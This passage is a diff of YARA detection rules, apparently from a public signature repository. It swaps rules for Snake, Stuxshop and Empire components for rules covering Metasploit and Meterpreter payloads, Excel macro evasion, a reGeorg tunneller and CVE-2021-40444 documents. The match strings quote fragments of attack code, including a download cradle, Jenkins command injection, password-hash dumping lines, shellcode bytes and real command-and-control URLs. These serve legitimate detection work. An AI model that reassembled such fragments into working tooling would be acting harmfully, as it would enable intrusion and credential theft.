+		$s1 = "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1)" fullword ascii
+		$s2 = ".concat(\".exe\");" fullword ascii
+		$s3 = "[0] = \"chmod\";" ascii
+		$s4 = "= Runtime.getRuntime().exec(" ascii
+		$s5 = ", 16) & 0xff;" ascii
+		$x1 = "4d5a9000030000000" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 3000KB and ( 1 of ( $x* ) or 3 of them )
+		4 of ( $s* ) or ( uint32( 0 ) == 0x61356434 and $x1 at 0 )
 }
-rule SIGNATURE_BASE_APT_MAL_RU_WIN_Snake_Malware_May23_1 : MEMORY
+rule SIGNATURE_BASE_Msfpayloads_Msf_10 : FILE
 {
 	meta:
-		description = "Hunting Russian Intelligence Snake Malware"
-		author = "Matt Suiche (Magnet Forensics)"
-		id = "53d2de3c-350c-5090-84bb-b6cde16a80ad"
-		date = "2023-05-10"
-		modified = "2025-03-21"
-		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ru_snake_may23.yar#L17-L42"
+		description = "Metasploit Payloads - file msf.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3bc3b66a-9f8a-55c2-ae2a-00faa778cef7"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L254-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7cff7152259bb17a9b72b91f0fbef220aad2f35a1d2758d7225316a9896bf845"
-		score = 70
-		quality = 71
-		tags = "MEMORY"
-		threat_name = "Windows.Malware.Snake"
-		scan_context = "memory"
-		license = "MIT"
+		logic_hash = "c772fdc40e110ef1287da680dc4ef1718b86856abab4d814ec7bc2ee1e7808ee"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082"
 
 	strings:
-		$a = { 25 73 23 31 }
-		$b = { 25 73 23 32 }
-		$c = { 25 73 23 33 }
-		$d = { 25 73 23 34 }
-		$e = { 2e 74 6d 70 }
-		$g = { 2e 73 61 76 }
-		$h = { 2e 75 70 64 }
+		$s1 = { 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 }
+		$s2 = { 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b }
+		$s3 = { 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_RU_Snake_Indicators_May23_1
+rule SIGNATURE_BASE_Msfpayloads_Msf_Svc : FILE
 {
 	meta:
-		description = "Detects indicators found in Snake malware samples"
-		author = "Florian Roth"
-		id = "0d4fa8a7-447c-5905-bab9-b63de6209036"
-		date = "2023-05-10"
-		modified = "2025-03-21"
-		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ru_snake_may23.yar#L45-L80"
+		description = "Metasploit Payloads - file msf-svc.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "45d1c527-1f90-50f3-8e64-e77d69386b0a"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L271-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb7a4ad2ee0868f17b6235f070e4c03e2394e3c252253f334b29ad26116b09e5"
-		score = 85
-		quality = 35
-		tags = ""
-		hash1 = "10b854d66240d9ee1ce4296d2f7857d2b1c6f062ca836d13d777930d678b3ca6"
-		hash2 = "15ac5a61fb3e751045de2d7f5ff26c673f3883e326cd1b3a63889984a4fb2a8f"
-		hash3 = "315ec991709eb45eccf724dfe31bccb7affcac7f8e8007e688ba8d02827205e0"
-		hash4 = "417eb4fb9ada270af35562ff317807ac5ca9ee26181fe89990858f0944d3a6a7"
-		hash5 = "48112970de6ea0f925f0657b30adcd0723df94afc98cfafdc991d70ad3602119"
-		hash6 = "55ea557bcf4c143f20c616abe9075f7faafbf825aeef9ddb4f2b201acc44414b"
-		hash7 = "6568bbeeb417e1111bf284e73152d90fe17e5497da7630ccddcbc666730dccef"
-		hash8 = "81d620cb645006ffc9ac1b9d98a53aa286ae92b025bda075962079633f020482"
-		hash9 = "888a3029b1b8b664eb1fc77dd511c4088a1e28ae5535a8683642bb3dca011d00"
-		hash10 = "9027b4fef50b36289d630059425dc1137c88328329c3ea9dbc348dccd001adc0"
-		hash11 = "9ac199572cab67433726976a0e9ba39d6feed1d567d6d230ebe3133df8dcb7fa"
-		hash12 = "a64e5d872421991226ee040b4cd49a89ca681bdef4c10c4798b6c7b5c832c6df"
-		hash13 = "b5d2da5eb57b5ab26edb927469552629f3cf43bbce2b1a128f6daac7cf57f6f7"
-		hash14 = "bc15de1d1c6c62c0bf856e0368adabc4941e7b687a969912494c173233e6d28d"
-		hash15 = "bdf94311313c39a3413464f623bd75a3db2eb05cc01090acd6dcd462a605eb4a"
-		hash16 = "e4311892ae00bf8148a94fa900fc8e2c279a2acd3b4b4b4c3d0c99dd1d32353c"
-		hash17 = "ed74288b367a93c6b47343bc696e751b9c465761ce9c4208901726baa758b234"
-		hash18 = "ef1f1c7692b92a730f76b6227643b2d02a6e353af6e930166e3b48e3903e4ffd"
-		hash19 = "f5e982b76af7f447742753f0b57eec3d7dd2e3c8e5506c35d4cf6c860b829f45"
+		logic_hash = "21c6aa2333335a5822328fb5176ca37060eb401640ed5cc340aefb63685078f4"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b02c9c10577ee0c7590d3dadc525c494122747a628a7bf714879b8e94ae5ea1"
 
 	strings:
-		$s1 = "\\\\.\\%s\\\\" ascii fullword
-		$s2 = "read_peer_nfo" ascii fullword
-		$s3 = "rcv_buf=%d%c" ascii fullword
-		$s4 = "%s: (0x%08x)" ascii fullword
-		$s5 = "no_impersonate" ascii fullword
+		$s1 = "PAYLOAD:" fullword ascii
+		$s2 = ".exehll" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_STUXSHOP_Config
+rule SIGNATURE_BASE_Msfpayloads_Msf_11
 {
 	meta:
-		description = "Stuxshop standalone sample configuration"
-		author = "JAG-S (turla@chronicle.security)"
-		id = "67367db5-51b3-5177-960a-5b06161154e2"
-		date = "2019-04-09"
+		description = "Metasploit Payloads - file msf.hta"
+		author = "Florian Roth (Nextron Systems)"
+		id = "59b0cced-ffdc-5f2f-878c-856883ee275f"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxshop.yar#L2-L30"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L287-L302"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
-		logic_hash = "9dd57f8b4e25a53dcf54dc75a1bb26675c7dd04dbb4d96286bcc0a6527a21782"
+		logic_hash = "f003989a99315b42c0c73beaa2928d0187fe92a4bf329912d64fac9f8fc9358c"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6"
 
 	strings:
-		$cnc1 = "http://211.24.237.226/index.php?data=" ascii wide
-		$cnc2 = "http://todaysfutbol.com/index.php?data=" ascii wide
-		$cnc3 = "http://78.111.169.146/index.php?data=" ascii wide
-		$cnc4 = "http://mypremierfutbol.com/index.php?data=" ascii wide
-		$regkey1 = "Software\\Microsoft\\Windows\\CurrentVersion\\MS-DOS Emulation" ascii wide
-		$regkey2 = "NTVDMParams" ascii wide
-		$flowerOverlap1 = { 85 C0 75 3B 57 FF 75 1C FF 75 18 FF 75 14 50 FF 75 10 FF 75 FC FF 15 }
-		$flowerOverlap2 = { 85 C0 75 4C 8B 45 1C 89 45 0C 8D 45 0C 50 8D 45 08 FF 75 18 50 6A 00 FF 75 10 FF 75 20 FF 15 }
-		$flowerOverlap3 = { 55 8B EC 53 56 8B 75 20 85 F6 74 03 83 26 00 8D 45 20 50 68 19 00 02 00 6A 00 FF 75 0C FF 75 08 }
-		$flowerOverlap4 = { 55 8B EC 51 8D 4D FC 33 C0 51 50 6A 26 50 89 45 FC FF 15 }
-		$flowerOverlap5 = { 85 DB 74 04 8B C3 EB 1A 8B 45 08 3B 45 14 74 07 B8 5D 06 00 00 EB 0B 85 F6 74 05 8B 45 0C 89 06 }
-		$flowerOverlap6 = { 85 FF 74 12 83 7D F8 01 75 0C FF 75 0C FF 75 08 FF 15 }
+		$s1 = ".ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then" fullword ascii
+		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s3 = "= CreateObject(\"Wscript.Shell\") " fullword ascii
 
 	condition:
-		all of ( $flowerOverlap* ) or 2 of ( $cnc* ) or all of ( $regkey* )
+		all of them
 }
-rule SIGNATURE_BASE_STUXSHOP_Oscheck
+rule SIGNATURE_BASE_Msfpayloads_Msf_Ref
 {
 	meta:
-		description = "Identifies the OS Check function in STUXSHOP and CheshireCat"
-		author = "Silas Cutler (havex@Chronicle.Security)"
-		id = "24fb5c6f-d5ab-5f17-942c-b712e2c017d4"
-		date = "2019-04-09"
+		description = "Metasploit Payloads - file msf-ref.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "517ed365-03c6-5563-984b-dae10464671a"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxshop.yar#L32-L47"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L304-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
-		logic_hash = "3dca26e622289c2d244e3af035e892455a47daa67dbe0c6fad29d9f7403cbc6b"
+		logic_hash = "ed6e408575b88ff67479ac1b1a2f37c5fad3ec200a446700840ad4245386bfc4"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87"
 
 	strings:
-		$ = {10 F7 D8 1B C0 83 C0 ?? E9 ?? 01 00 00 39 85 7C FF FF FF 0F 85 ?? 01 00
-      00 83 BD 70 FF FF FF 04 8B 8D 74 FF FF FF 75 0B 85 C9 0F 85 ?? 01 00 00 6A 05
-      5E }
-		$ = {01 00 00 3B FA 0F 84 ?? 01 00 00 80 7D 80 00 B1 62 74 1D 6A 0D 8D 45 80
-      68 ?? ?? ?? 10 50 FF 15 ?? ?? ?? 10 83 C4 0C B1 6F 85 C0 75 03 8A 4D 8D 8B C6
-      }
+		$s1 = "kernel32.dll WaitForSingleObject)," ascii
+		$s2 = "= ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')" ascii
+		$s3 = "GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object" ascii
+		$s4 = ".DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual'," ascii
+		$s5 = "= [System.Convert]::FromBase64String(" ascii
+		$s6 = "[Parameter(Position = 0, Mandatory = $True)] [Type[]]" fullword ascii
+		$s7 = "DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard," ascii
 
 	condition:
-		any of them
+		5 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Metasploitpayload : FILE
+rule SIGNATURE_BASE_MAL_Metasploit_Framework_UA : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
+		description = "Detects User Agent used in Metasploit Framework"
 		author = "Florian Roth (Nextron Systems)"
-		id = "608c30b0-826a-55b1-afb8-756b476d6b55"
-		date = "2016-11-05"
+		id = "e5a18456-3a07-5b58-ad95-086152298a1f"
+		date = "2018-08-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L10-L24"
+		reference = "https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L325-L339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1399818f71544245a7b689a7eb4da794b10814590e4c5f545fc28237ffa3d0f6"
-		score = 75
+		logic_hash = "986fea99735b93aed9dbf72582c009e11a1e7ba19b256902f93312474ef34b4a"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
+		hash1 = "1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29"
 
 	strings:
-		$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
-		$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Empire_Exploit_Jenkins : FILE
+rule SIGNATURE_BASE_HKTL_Meterpreter_Inmemory
 {
 	meta:
-		description = "Detects Empire component - file Exploit-Jenkins.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L26-L41"
+		description = "Detects Meterpreter in-memory"
+		author = "netbiosX, Florian Roth"
+		id = "29c3bb7e-4da8-5924-ada7-2f28d9352009"
+		date = "2020-06-29"
+		modified = "2023-04-21"
+		reference = "https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L341-L363"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "caf65814a1aeb0e14ec6430f7d5692b9c090bdc0d453566f0b0abd703f74bac7"
-		score = 75
+		logic_hash = "4b39dbcb276842a1306205cf2e51ce86b6d2aa21353d277df15f4ea3b3d97678"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
+		tags = ""
 
 	strings:
-		$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
-		$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
-		$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
+		$sxc1 = { 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C
+               65 63 74 69 76 65 4C 6F 61 64 65 72 }
+		$sxs1 = "metsrv.x64.dll" ascii fullword
+		$ss1 = "WS2_32.dll" ascii fullword
+		$ss2 = "ReflectiveLoader" ascii fullword
+		$fp1 = "SentinelOne" ascii wide
+		$fp2 = "fortiESNAC" ascii wide
+		$fp3 = "PSNMVHookMS" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
+		(1 of ( $sx* ) or 2 of ( $s* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Empire_Get_Securitypackages : FILE
+rule SIGNATURE_BASE_Gen_Excel_Auto_Open_Evasion : FILE
 {
 	meta:
-		description = "Detects Empire component - file Get-SecurityPackages.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
-		date = "2016-11-05"
+		description = "Detects an obfuscated Auto_Open cell names in Excel files"
+		author = "@JohnLaTwC"
+		id = "e33b8d1d-4978-5747-8b5b-730e6c57dbf0"
+		date = "2020-09-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L43-L57"
+		reference = "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_auto_open_evasion.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d63fdcc6713d2f7645b16cf3e79a6e951c7751a10bfa0e2853def47ea9547d2"
-		score = 75
-		quality = 85
+		hash = "e23f9f55e10f3f31a2e76a12b174b6741a2fa1f51cf23dbd69cf169d92c56ed5"
+		logic_hash = "d7d81683b9abd7b89d6d6ee4d14ff37359acd353a6bd1d88bc793525c8f203d9"
+		score = 70
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
+		hash1 = "bb3c9739de8ffe2e0f375847d41a010463ec19f1d3f578ac053651a51ed69bbc"
+		hash2 = "56ff65b7f6bf5936883f52b50ca66e768b2088158cc77af681ffab7122be7753"
+		hash3 = "97243214ac3cad74d60b0648e39d6a9600860edba51c670b5226e058ba658957"
+		hash4 = "9ebf085c05ae94c1b6c4e011001a6c11de3ca754a56ed380314ef501b777e593"
+		hash5 = "b5a8bbf3c7d49bd208d8302f6867b5f6d3d7c09830b575967801893498cc92d9"
 
 	strings:
-		$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
-		$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
+		$auto_open = { 00 00 00 00 01 [0-2] (61 | 41) [0-5](75 | 55) [0-5](74 | 54) [0-5](6f | 4f) [0-5](5f | 5f) [0-5](6f | 4f) [0-5](70 | 50) [0-5](65 | 45) [0-5](6e | 4e)}
+		$plain_auto_open = "auto_open" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+		filesize < 1MB and uint32be( 0 ) == 0xD0CF11E0 and $auto_open and #plain_auto_open == 0
 }
-rule SIGNATURE_BASE_Empire_Invoke_Powerdump : FILE
+rule SIGNATURE_BASE_REGEORG_Tuneller_Generic : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PowerDump.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
-		date = "2016-11-05"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Mandiant"
+		id = "a87979b7-2732-5a32-b3f3-a815a58b6589"
+		date = "2021-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L59-L74"
+		reference = "https://www.mandiant.com/resources/unc3524-eye-spy-email"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/webshell_regeorg.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e460d015be54a88d0eb5741a9c32cf6d7a410e0beb5356402af0dd19d1b4c6f2"
+		hash = "ba22992ce835dadcd06bff4ab7b162f9"
+		logic_hash = "1657928875c3cd2d5bf774929b0497d78f0211b321f8a4138cc9b8c80b9f99d6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
+		date_modified = "2021-12-20"
 
 	strings:
-		$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
-		$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
-		$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
+		$s1 = "System.Net.IPEndPoint"
+		$s2 = "Response.AddHeader"
+		$s3 = "Request.InputStream.Read"
+		$s4 = "Request.Headers.Get"
+		$s5 = "Response.Write"
+		$s6 = "System.Buffer.BlockCopy"
+		$s7 = "Response.BinaryWrite"
+		$s8 = "SocketException soex"
 
 	condition:
-		( uint16( 0 ) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
+		filesize < 1MB and 7 of them
 }
-rule SIGNATURE_BASE_Empire_Install_SSP : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_40444_Document_Rels_XML : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects Empire component - file Install-SSP.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
-		date = "2016-11-05"
+		description = "Detects indicators found in weaponized documents that exploit CVE-2021-40444"
+		author = "Jeremy Brown / @alteredbytes"
+		id = "812bb68e-71ea-5a9a-8d39-ab99fdaa6c58"
+		date = "2021-09-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L76-L89"
+		reference = "https://twitter.com/AlteredBytes/status/1435811407249952772"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L6-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf0966d0141d4606983f267face635ef5fddbc73282f02f0a0ae6fcf89f2e6dc"
+		logic_hash = "b05c3b33c3cab2c9109d808ed197758bc987f07beee77e1f61094715e0c1a1e7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
+		tags = "CVE-2021-40444, FILE"
 
 	strings:
-		$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
+		$b1 = "/relationships/oleObject" ascii
+		$b2 = "/relationships/attachedTemplate" ascii
+		$c1 = "Target=\"mhtml:http" nocase
+		$c2 = "!x-usc:http" nocase
+		$c3 = "TargetMode=\"External\"" nocase
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+		uint32( 0 ) == 0x6D783F3C and filesize < 10KB and 1 of ( $b* ) and all of ( $c* )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Shellcodemsil : FILE
+rule SIGNATURE_BASE_EXPL_MAL_Maldoc_OBFUSCT_MHTML_Sep21_1 : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
+		description = "Detects suspicious office reference files including an obfuscated MHTML reference exploiting CVE-2021-40444"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
-		date = "2016-11-05"
+		id = "781cfd61-d5ac-58e5-868f-dbd2a2df3500"
+		date = "2021-09-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L91-L107"
+		reference = "https://twitter.com/decalage2/status/1438946225190014984?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb556fb8b558145e7e981ab3c3ccfb2656512498b917c705e53bc5b9f3650155"
-		score = 75
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "11a73572970d2d85d308330119a2c5243f2848ae78a861decdb0cdbde0d9d1c2"
+		score = 90
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
+		tags = "CVE-2021-40444, FILE"
 
 	strings:
-		$s1 = "$FinalShellcode.Length" fullword ascii
-		$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
-		$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
-		$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
+		$h1 = "<?xml " ascii wide
+		$s1 = "109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#109;&#108" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Empire_Powerup : FILE
+rule SIGNATURE_BASE_EXPL_XML_Encoded_CVE_2021_40444 : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects Empire component - file PowerUp.ps1"
+		description = "Detects possible CVE-2021-40444 with no encoding, HTML/XML entity (and hex notation) encoding, or all 3"
+		author = "James E.C, Proofpoint"
+		id = "4bf9ec64-c662-5c8f-9e58-12a7412ef07d"
+		date = "2021-09-18"
+		modified = "2021-09-19"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L44-L61"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "feaeadd8e7e262f191ea0c2f85377531208262e5ac19d6706703e62cf8b4ec90"
+		score = 70
+		quality = 60
+		tags = "CVE-2021-40444, FILE"
+
+	strings:
+		$h1 = "<?xml " ascii wide
+		$t_xml_r = /Target[\s]{0,20}=[\s]{0,20}\["']([Mm]|&#(109|77|x6d|x4d);)([Hh]|&#(104|72|x68|x48);)([Tt]|&#(116|84|x74|x54);)([Mm]|&#(109|77|x6d|x4d);)([Ll]|&#(108|76|x6c|x4c);)(:|&#58;|&#x3a)/
+		$t_mode_r = /TargetMode[\s]{0,20}=[\s]{0,20}\["']([Ee]|&#(x45|x65|69|101);)([Xx]|&#(x58|x78|88|120);)([Tt]|&#(x74|x54|84|116);)/
+
+	condition:
